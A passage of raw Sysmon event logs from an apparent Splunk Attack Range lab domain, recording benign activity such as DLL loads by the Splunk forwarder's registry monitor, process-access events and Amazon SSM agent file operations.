10341000x800000000000000021219600Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.900{AD5E2759-5B45-618E-0BCE-08000000F101}30925600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219599Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:09.759{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37528D2FC2F388F567E2F6DB9591C5A5,SHA256=9DC5B2C281EF25B9DF9D9DC70124FA118F8C653E7C83941EF97F7CB2351AF5C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057345518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057345514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057345512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.854{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.839{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.839{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.839{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.834{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.833{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.833{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.832{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.832{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.831{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.830{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.830{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.830{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.830{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.828{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.828{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.828{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.828{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.827{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.827{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.827{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.827{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.827{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 23542300x800000000000000057345489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.826{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\respondent-20211011185456-44546MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63Bfalsetrue 734700x800000000000000057345488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.826{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057345487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.826{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.825{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.825{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.825{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.825{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.825{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.824{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.824{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057345479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.822{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057345478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.822{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\respondent-20211011185456-445462021-11-12 12:17:09.822 734700x800000000000000057345477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.822{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.821{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 11241100x800000000000000057345475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.821{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\surveyor-20211011185454-445472021-11-12 12:17:09.821 734700x800000000000000057345474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.820{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.805{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x800000000000000057345472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.805{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.805{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.790{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk 